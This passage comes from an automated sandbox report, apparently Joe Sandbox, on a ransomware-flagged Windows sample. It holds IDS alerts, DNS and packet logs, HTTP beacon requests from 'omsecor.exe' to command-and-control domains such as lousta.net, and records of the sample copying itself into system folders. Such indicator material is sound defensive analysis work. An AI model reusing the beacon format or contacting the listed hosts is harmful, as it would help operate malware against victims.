                        2024-12-05T18:09:19.895177+0100 | 2016998 | ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host) | 1 | 192.168.2.7 | 49708 | 193.166.255.171 | 80 | TCP
                        2024-12-05T18:09:41.929645+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.7 | 49708 | 193.166.255.171 | 80 | TCP
                        2024-12-05T18:10:04.071060+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.7 | 49771 | 193.166.255.171 | 80 | TCP
                        2024-12-05T18:10:05.646999+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.7 | 49827 | 15.197.204.56 | 80 | TCP
                        2024-12-05T18:10:07.719093+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.7 | 49833 | 52.34.198.229 | 80 | TCP
                        2024-12-05T18:10:07.909220+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 52.34.198.229 | 80 | 192.168.2.7 | 49833 | TCP
                        2024-12-05T18:10:07.909220+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 52.34.198.229 | 80 | 192.168.2.7 | 49833 | TCP
                        2024-12-05T18:10:32.196627+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.7 | 49844 | 193.166.255.171 | 80 | TCP
                        2024-12-05T18:10:54.384861+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.7 | 49898 | 193.166.255.171 | 80 | TCP
                        2024-12-05T18:10:55.730671+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.7 | 49951 | 15.197.204.56 | 80 | TCP
                        2024-12-05T18:10:57.327496+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.7 | 49955 | 52.34.198.229 | 80 | TCP
                        2024-12-05T18:11:21.525774+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.7 | 49963 | 193.166.255.171 | 80 | TCP
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Dec 5, 2024 18:09:19.895176888 CET | 49708 | 80 | 192.168.2.7 | 193.166.255.171
                        Dec 5, 2024 18:09:20.015081882 CET | 80 | 49708 | 193.166.255.171 | 192.168.2.7
                        Dec 5, 2024 18:09:20.015182972 CET | 49708 | 80 | 192.168.2.7 | 193.166.255.171
                        Dec 5, 2024 18:09:20.022612095 CET | 49708 | 80 | 192.168.2.7 | 193.166.255.171
                        Dec 5, 2024 18:09:20.142782927 CET | 80 | 49708 | 193.166.255.171 | 192.168.2.7
                        Dec 5, 2024 18:09:41.929482937 CET | 80 | 49708 | 193.166.255.171 | 192.168.2.7
                        Dec 5, 2024 18:09:41.929645061 CET | 49708 | 80 | 192.168.2.7 | 193.166.255.171
                        Dec 5, 2024 18:09:41.930557013 CET | 49708 | 80 | 192.168.2.7 | 193.166.255.171
                        Dec 5, 2024 18:09:42.043328047 CET | 49771 | 80 | 192.168.2.7 | 193.166.255.171
                        Dec 5, 2024 18:09:42.050311089 CET | 80 | 49708 | 193.166.255.171 | 192.168.2.7
                        Dec 5, 2024 18:09:42.163161993 CET | 80 | 49771 | 193.166.255.171 | 192.168.2.7
                        Dec 5, 2024 18:09:42.163412094 CET | 49771 | 80 | 192.168.2.7 | 193.166.255.171
                        Dec 5, 2024 18:09:42.163638115 CET | 49771 | 80 | 192.168.2.7 | 193.166.255.171
                        Dec 5, 2024 18:09:42.283363104 CET | 80 | 49771 | 193.166.255.171 | 192.168.2.7
                        Dec 5, 2024 18:10:04.070904970 CET | 80 | 49771 | 193.166.255.171 | 192.168.2.7
                        Dec 5, 2024 18:10:04.071059942 CET | 49771 | 80 | 192.168.2.7 | 193.166.255.171
                        Dec 5, 2024 18:10:04.071096897 CET | 49771 | 80 | 192.168.2.7 | 193.166.255.171
                        Dec 5, 2024 18:10:04.191118002 CET | 80 | 49771 | 193.166.255.171 | 192.168.2.7
                        Dec 5, 2024 18:10:04.421276093 CET | 49827 | 80 | 192.168.2.7 | 15.197.204.56
                        Dec 5, 2024 18:10:04.541254997 CET | 80 | 49827 | 15.197.204.56 | 192.168.2.7
                        Dec 5, 2024 18:10:04.541412115 CET | 49827 | 80 | 192.168.2.7 | 15.197.204.56
                        Dec 5, 2024 18:10:04.541574955 CET | 49827 | 80 | 192.168.2.7 | 15.197.204.56
                        Dec 5, 2024 18:10:04.662012100 CET | 80 | 49827 | 15.197.204.56 | 192.168.2.7
                        Dec 5, 2024 18:10:05.646893978 CET | 80 | 49827 | 15.197.204.56 | 192.168.2.7
                        Dec 5, 2024 18:10:05.646998882 CET | 49827 | 80 | 192.168.2.7 | 15.197.204.56
                        Dec 5, 2024 18:10:06.236660957 CET | 49833 | 80 | 192.168.2.7 | 52.34.198.229
                        Dec 5, 2024 18:10:06.356581926 CET | 80 | 49833 | 52.34.198.229 | 192.168.2.7
                        Dec 5, 2024 18:10:06.356738091 CET | 49833 | 80 | 192.168.2.7 | 52.34.198.229
                        Dec 5, 2024 18:10:06.357047081 CET | 49833 | 80 | 192.168.2.7 | 52.34.198.229
                        Dec 5, 2024 18:10:06.477431059 CET | 80 | 49833 | 52.34.198.229 | 192.168.2.7
                        Dec 5, 2024 18:10:07.718915939 CET | 80 | 49833 | 52.34.198.229 | 192.168.2.7
                        Dec 5, 2024 18:10:07.719068050 CET | 80 | 49833 | 52.34.198.229 | 192.168.2.7
                        Dec 5, 2024 18:10:07.719093084 CET | 49833 | 80 | 192.168.2.7 | 52.34.198.229
                        Dec 5, 2024 18:10:07.719152927 CET | 49833 | 80 | 192.168.2.7 | 52.34.198.229
                        Dec 5, 2024 18:10:07.789298058 CET | 49833 | 80 | 192.168.2.7 | 52.34.198.229
                        Dec 5, 2024 18:10:07.909219980 CET | 80 | 49833 | 52.34.198.229 | 192.168.2.7
                        Dec 5, 2024 18:10:08.695266962 CET | 49827 | 80 | 192.168.2.7 | 15.197.204.56
                        Dec 5, 2024 18:10:10.162571907 CET | 49844 | 80 | 192.168.2.7 | 193.166.255.171
                        Dec 5, 2024 18:10:10.282452106 CET | 80 | 49844 | 193.166.255.171 | 192.168.2.7
                        Dec 5, 2024 18:10:10.282543898 CET | 49844 | 80 | 192.168.2.7 | 193.166.255.171
                        Dec 5, 2024 18:10:10.282772064 CET | 49844 | 80 | 192.168.2.7 | 193.166.255.171
                        Dec 5, 2024 18:10:10.402587891 CET | 80 | 49844 | 193.166.255.171 | 192.168.2.7
                        Dec 5, 2024 18:10:32.196511984 CET | 80 | 49844 | 193.166.255.171 | 192.168.2.7
                        Dec 5, 2024 18:10:32.196626902 CET | 49844 | 80 | 192.168.2.7 | 193.166.255.171
                        Dec 5, 2024 18:10:32.196803093 CET | 49844 | 80 | 192.168.2.7 | 193.166.255.171
                        Dec 5, 2024 18:10:32.316574097 CET | 80 | 49844 | 193.166.255.171 | 192.168.2.7
                        Dec 5, 2024 18:10:32.365041971 CET4989880192.168.2.7193.166.255.171
                        Dec 5, 2024 18:10:32.485018015 CET8049898193.166.255.171192.168.2.7
                        Dec 5, 2024 18:10:32.485133886 CET4989880192.168.2.7193.166.255.171
                        Dec 5, 2024 18:10:32.546143055 CET4989880192.168.2.7193.166.255.171
                        Dec 5, 2024 18:10:32.666019917 CET8049898193.166.255.171192.168.2.7
                        Dec 5, 2024 18:10:54.384713888 CET8049898193.166.255.171192.168.2.7
                        Dec 5, 2024 18:10:54.384860992 CET4989880192.168.2.7193.166.255.171
                        Dec 5, 2024 18:10:54.384974957 CET4989880192.168.2.7193.166.255.171
                        Dec 5, 2024 18:10:54.500397921 CET4995180192.168.2.715.197.204.56
                        Dec 5, 2024 18:10:54.504889011 CET8049898193.166.255.171192.168.2.7
                        Dec 5, 2024 18:10:54.620868921 CET804995115.197.204.56192.168.2.7
                        Dec 5, 2024 18:10:54.621009111 CET4995180192.168.2.715.197.204.56
                        Dec 5, 2024 18:10:54.621197939 CET4995180192.168.2.715.197.204.56
                        Dec 5, 2024 18:10:54.741923094 CET804995115.197.204.56192.168.2.7
                        Dec 5, 2024 18:10:55.730530977 CET804995115.197.204.56192.168.2.7
                        Dec 5, 2024 18:10:55.730670929 CET4995180192.168.2.715.197.204.56
                        Dec 5, 2024 18:10:55.843384027 CET4995580192.168.2.752.34.198.229
                        Dec 5, 2024 18:10:55.963144064 CET804995552.34.198.229192.168.2.7
                        Dec 5, 2024 18:10:55.963241100 CET4995580192.168.2.752.34.198.229
                        Dec 5, 2024 18:10:55.963536978 CET4995580192.168.2.752.34.198.229
                        Dec 5, 2024 18:10:56.086004019 CET804995552.34.198.229192.168.2.7
                        Dec 5, 2024 18:10:57.327356100 CET804995552.34.198.229192.168.2.7
                        Dec 5, 2024 18:10:57.327496052 CET4995580192.168.2.752.34.198.229
                        Dec 5, 2024 18:10:57.328866005 CET804995552.34.198.229192.168.2.7
                        Dec 5, 2024 18:10:57.328933001 CET4995580192.168.2.752.34.198.229
                        Dec 5, 2024 18:10:57.328969002 CET4995580192.168.2.752.34.198.229
                        Dec 5, 2024 18:10:57.448900938 CET804995552.34.198.229192.168.2.7
                        Dec 5, 2024 18:10:57.560251951 CET4995180192.168.2.715.197.204.56
                        Dec 5, 2024 18:10:59.493081093 CET4996380192.168.2.7193.166.255.171
                        Dec 5, 2024 18:10:59.613873005 CET8049963193.166.255.171192.168.2.7
                        Dec 5, 2024 18:10:59.614020109 CET4996380192.168.2.7193.166.255.171
                        Dec 5, 2024 18:10:59.614279985 CET4996380192.168.2.7193.166.255.171
                        Dec 5, 2024 18:10:59.734798908 CET8049963193.166.255.171192.168.2.7
                        Dec 5, 2024 18:11:21.525563002 CET8049963193.166.255.171192.168.2.7
                        Dec 5, 2024 18:11:21.525774002 CET4996380192.168.2.7193.166.255.171
                        Dec 5, 2024 18:11:21.525877953 CET4996380192.168.2.7193.166.255.171
                        Dec 5, 2024 18:11:21.637634039 CET5000180192.168.2.7193.166.255.171
                        Dec 5, 2024 18:11:21.646197081 CET8049963193.166.255.171192.168.2.7
                        Dec 5, 2024 18:11:21.757520914 CET8050001193.166.255.171192.168.2.7
                        Dec 5, 2024 18:11:21.757687092 CET5000180192.168.2.7193.166.255.171
                        Dec 5, 2024 18:11:21.757900000 CET5000180192.168.2.7193.166.255.171
                        Dec 5, 2024 18:11:21.877674103 CET8050001193.166.255.171192.168.2.7
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Dec 5, 2024 18:09:19.644263029 CET | 63432 | 53 | 192.168.2.7 | 1.1.1.1
                        Dec 5, 2024 18:09:19.878498077 CET | 53 | 63432 | 1.1.1.1 | 192.168.2.7
                        Dec 5, 2024 18:10:04.185692072 CET | 49192 | 53 | 192.168.2.7 | 1.1.1.1
                        Dec 5, 2024 18:10:04.420393944 CET | 53 | 49192 | 1.1.1.1 | 192.168.2.7
                        Dec 5, 2024 18:10:05.764008999 CET | 59605 | 53 | 192.168.2.7 | 1.1.1.1
                        Dec 5, 2024 18:10:06.235613108 CET | 53 | 59605 | 1.1.1.1 | 192.168.2.7
                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                        Dec 5, 2024 18:09:19.644263029 CET | 192.168.2.7 | 1.1.1.1 | 0x8d43 | Standard query (0) | lousta.net | A (IP address) | IN (0x0001) | false
                        Dec 5, 2024 18:10:04.185692072 CET | 192.168.2.7 | 1.1.1.1 | 0x8357 | Standard query (0) | mkkuei4kdsz.com | A (IP address) | IN (0x0001) | false
                        Dec 5, 2024 18:10:05.764008999 CET | 192.168.2.7 | 1.1.1.1 | 0xdf48 | Standard query (0) | ow5dirasuek.com | A (IP address) | IN (0x0001) | false
                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        Dec 5, 2024 18:09:15.006210089 CET | 1.1.1.1 | 192.168.2.7 | 0x2eb6 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
                        Dec 5, 2024 18:09:15.006210089 CET | 1.1.1.1 | 192.168.2.7 | 0x2eb6 | No error (0) | s-part-0035.t-0009.t-msedge.net |  | 13.107.246.63 | A (IP address) | IN (0x0001) | false
                        Dec 5, 2024 18:09:19.878498077 CET | 1.1.1.1 | 192.168.2.7 | 0x8d43 | No error (0) | lousta.net |  | 193.166.255.171 | A (IP address) | IN (0x0001) | false
                        Dec 5, 2024 18:10:04.420393944 CET | 1.1.1.1 | 192.168.2.7 | 0x8357 | No error (0) | mkkuei4kdsz.com |  | 15.197.204.56 | A (IP address) | IN (0x0001) | false
                        Dec 5, 2024 18:10:04.420393944 CET | 1.1.1.1 | 192.168.2.7 | 0x8357 | No error (0) | mkkuei4kdsz.com |  | 3.33.243.145 | A (IP address) | IN (0x0001) | false
                        Dec 5, 2024 18:10:06.235613108 CET | 1.1.1.1 | 192.168.2.7 | 0xdf48 | No error (0) | ow5dirasuek.com |  | 52.34.198.229 | A (IP address) | IN (0x0001) | false
                        • lousta.net
                        • mkkuei4kdsz.com
                        • ow5dirasuek.com
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.7 | 49708 | 193.166.255.171 | 80 | 7452 | C:\Users\user\AppData\Roaming\omsecor.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Dec 5, 2024 18:09:20.022612095 CET | 186 | OUT | GET /370/988.html HTTP/1.1
                        From: 133778921561632797
                        Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148
                        Host: lousta.net
                        Connection: Keep-Alive


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        1 | 192.168.2.7 | 49771 | 193.166.255.171 | 80 | 7452 | C:\Users\user\AppData\Roaming\omsecor.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Dec 5, 2024 18:09:42.163638115 CET | 186 | OUT | GET /400/589.html HTTP/1.1
                        From: 133778921561632797
                        Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148
                        Host: lousta.net
                        Connection: Keep-Alive


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        2 | 192.168.2.7 | 49827 | 15.197.204.56 | 80 | 7452 | C:\Users\user\AppData\Roaming\omsecor.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Dec 5, 2024 18:10:04.541574955 CET | 191 | OUT | GET /931/166.html HTTP/1.1
                        From: 133778921561632797
                        Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148
                        Host: mkkuei4kdsz.com
                        Connection: Keep-Alive
                        Dec 5, 2024 18:10:05.646893978 CET | 259 | IN | HTTP/1.1 200 OK
                        Server: openresty
                        Date: Thu, 05 Dec 2024 17:10:05 GMT
                        Content-Type: text/html
                        Content-Length: 114
                        Connection: keep-alive
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        3 | 192.168.2.7 | 49833 | 52.34.198.229 | 80 | 7452 | C:\Users\user\AppData\Roaming\omsecor.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Dec 5, 2024 18:10:06.357047081 CET | 191 | OUT | GET /612/675.html HTTP/1.1
                        From: 133778921561632797
                        Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148
                        Host: ow5dirasuek.com
                        Connection: Keep-Alive
                        Dec 5, 2024 18:10:07.718915939 CET | 415 | IN | HTTP/1.1 200 OK
                        Server: nginx
                        Date: Thu, 05 Dec 2024 17:10:07 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: btst=761ae05900180e6968d7f120981b37d6|8.46.123.228|1733418607|1733418607|0|1|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                        Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                        Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        4 | 192.168.2.7 | 49844 | 193.166.255.171 | 80 | 396 | C:\Users\user\AppData\Roaming\omsecor.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Dec 5, 2024 18:10:10.282772064 CET | 186 | OUT | GET /206/582.html HTTP/1.1
                        From: 133778921561632797
                        Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148
                        Host: lousta.net
                        Connection: Keep-Alive


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        5 | 192.168.2.7 | 49898 | 193.166.255.171 | 80 | 396 | C:\Users\user\AppData\Roaming\omsecor.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Dec 5, 2024 18:10:32.546143055 CET | 186 | OUT | GET /861/856.html HTTP/1.1
                        From: 133778921561632797
                        Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148
                        Host: lousta.net
                        Connection: Keep-Alive


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        6 | 192.168.2.7 | 49951 | 15.197.204.56 | 80 | 396 | C:\Users\user\AppData\Roaming\omsecor.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Dec 5, 2024 18:10:54.621197939 CET | 191 | OUT | GET /441/819.html HTTP/1.1
                        From: 133778921561632797
                        Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148
                        Host: mkkuei4kdsz.com
                        Connection: Keep-Alive
                        Dec 5, 2024 18:10:55.730530977 CET | 259 | IN | HTTP/1.1 200 OK
                        Server: openresty
                        Date: Thu, 05 Dec 2024 17:10:55 GMT
                        Content-Type: text/html
                        Content-Length: 114
                        Connection: keep-alive
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        7 | 192.168.2.7 | 49955 | 52.34.198.229 | 80 | 396 | C:\Users\user\AppData\Roaming\omsecor.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Dec 5, 2024 18:10:55.963536978 CET | 298 | OUT | GET /358/336.html HTTP/1.1
                        From: 133778921561632797
                        Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148
                        Host: ow5dirasuek.com
                        Connection: Keep-Alive
                        Cookie: snkz=8.46.123.228; btst=761ae05900180e6968d7f120981b37d6|8.46.123.228|1733418607|1733418607|0|1|0
                        Dec 5, 2024 18:10:57.327356100 CET | 338 | IN | HTTP/1.1 200 OK
                        Server: nginx
                        Date: Thu, 05 Dec 2024 17:10:57 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: btst=761ae05900180e6968d7f120981b37d6|8.46.123.228|1733418657|1733418607|25|2|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                        Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        8 | 192.168.2.7 | 49963 | 193.166.255.171 | 80 | 7296 | C:\Users\user\AppData\Roaming\omsecor.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Dec 5, 2024 18:10:59.614279985 CET | 186 | OUT | GET /349/212.html HTTP/1.1
                        From: 133778921561632797
                        Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148
                        Host: lousta.net
                        Connection: Keep-Alive


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        9 | 192.168.2.7 | 50001 | 193.166.255.171 | 80 | 7296 | C:\Users\user\AppData\Roaming\omsecor.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Dec 5, 2024 18:11:21.757900000 CET | 186 | OUT | GET /952/351.html HTTP/1.1
                        From: 133778921561632797
                        Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148
                        Host: lousta.net
                        Connection: Keep-Alive


                        Target ID:0
                        Start time:12:09:15
                        Start date:05/12/2024
                        Path:C:\Users\user\Desktop\fmlgbgc2p5.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\fmlgbgc2p5.exe"
                        Imagebase:0x400000
                        File size:98'330 bytes
                        MD5 hash:809D8BEDB2DA450B588BF82E9A118FE4
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:2
                        Start time:12:09:16
                        Start date:05/12/2024
                        Path:C:\Users\user\Desktop\fmlgbgc2p5.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\Desktop\fmlgbgc2p5.exe
                        Imagebase:0x400000
                        File size:98'330 bytes
                        MD5 hash:809D8BEDB2DA450B588BF82E9A118FE4
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:4
                        Start time:12:09:16
                        Start date:05/12/2024
                        Path:C:\Users\user\AppData\Roaming\omsecor.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\omsecor.exe
                        Imagebase:0x400000
                        File size:98'330 bytes
                        MD5 hash:6E897A612472AD8B51062A6844A8A17B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 100%, Joe Sandbox ML
                        Reputation:low
                        Has exited:true

                        Target ID:6
                        Start time:12:09:16
                        Start date:05/12/2024
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 304
                        Imagebase:0xdd0000
                        File size:483'680 bytes
                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:7
                        Start time:12:09:16
                        Start date:05/12/2024
                        Path:C:\Users\user\AppData\Roaming\omsecor.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\omsecor.exe
                        Imagebase:0x400000
                        File size:98'330 bytes
                        MD5 hash:6E897A612472AD8B51062A6844A8A17B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:10
                        Start time:12:09:16
                        Start date:05/12/2024
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7360 -s 276
                        Imagebase:0xdd0000
                        File size:483'680 bytes
                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:13
                        Start time:12:10:07
                        Start date:05/12/2024
                        Path:C:\Windows\SysWOW64\omsecor.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\System32\omsecor.exe
                        Imagebase:0x400000
                        File size:98'330 bytes
                        MD5 hash:678D56882701DBE0727C09DD075B56D1
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 100%, Joe Sandbox ML
                        Reputation:low
                        Has exited:true

                        Target ID:14
                        Start time:12:10:08
                        Start date:05/12/2024
                        Path:C:\Windows\SysWOW64\omsecor.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\omsecor.exe
                        Imagebase:0x400000
                        File size:98'330 bytes
                        MD5 hash:678D56882701DBE0727C09DD075B56D1
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:16
                        Start time:12:10:08
                        Start date:05/12/2024
                        Path:C:\Users\user\AppData\Roaming\omsecor.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\omsecor.exe
                        Imagebase:0x400000
                        File size:98'330 bytes
                        MD5 hash:A4BA09D8D586AF0201C2E6584BE09E59
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:17
                        Start time:12:10:08
                        Start date:05/12/2024
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8072 -s 280
                        Imagebase:0xdd0000
                        File size:483'680 bytes
                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:18
                        Start time:12:10:09
                        Start date:05/12/2024
                        Path:C:\Users\user\AppData\Roaming\omsecor.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\omsecor.exe
                        Imagebase:0x400000
                        File size:98'330 bytes
                        MD5 hash:A4BA09D8D586AF0201C2E6584BE09E59
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:20
                        Start time:12:10:09
                        Start date:05/12/2024
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8132 -s 276
                        Imagebase:0xdd0000
                        File size:483'680 bytes
                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:23
                        Start time:12:10:57
                        Start date:05/12/2024
                        Path:C:\Windows\SysWOW64\omsecor.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\System32\omsecor.exe
                        Imagebase:0x400000
                        File size:98'330 bytes
                        MD5 hash:75B0F2A9AD432A0DBC138A050D744956
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:24
                        Start time:12:10:58
                        Start date:05/12/2024
                        Path:C:\Windows\SysWOW64\omsecor.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\omsecor.exe
                        Imagebase:0x400000
                        File size:98'330 bytes
                        MD5 hash:75B0F2A9AD432A0DBC138A050D744956
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:26
                        Start time:12:10:58
                        Start date:05/12/2024
                        Path:C:\Users\user\AppData\Roaming\omsecor.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\omsecor.exe
                        Imagebase:0x400000
                        File size:98'330 bytes
                        MD5 hash:50E482AEFE2A49BBCB4AAEE1B8C70305
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:27
                        Start time:12:10:58
                        Start date:05/12/2024
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 248
                        Imagebase:0xdd0000
                        File size:483'680 bytes
                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:28
                        Start time:12:10:58
                        Start date:05/12/2024
                        Path:C:\Users\user\AppData\Roaming\omsecor.exe
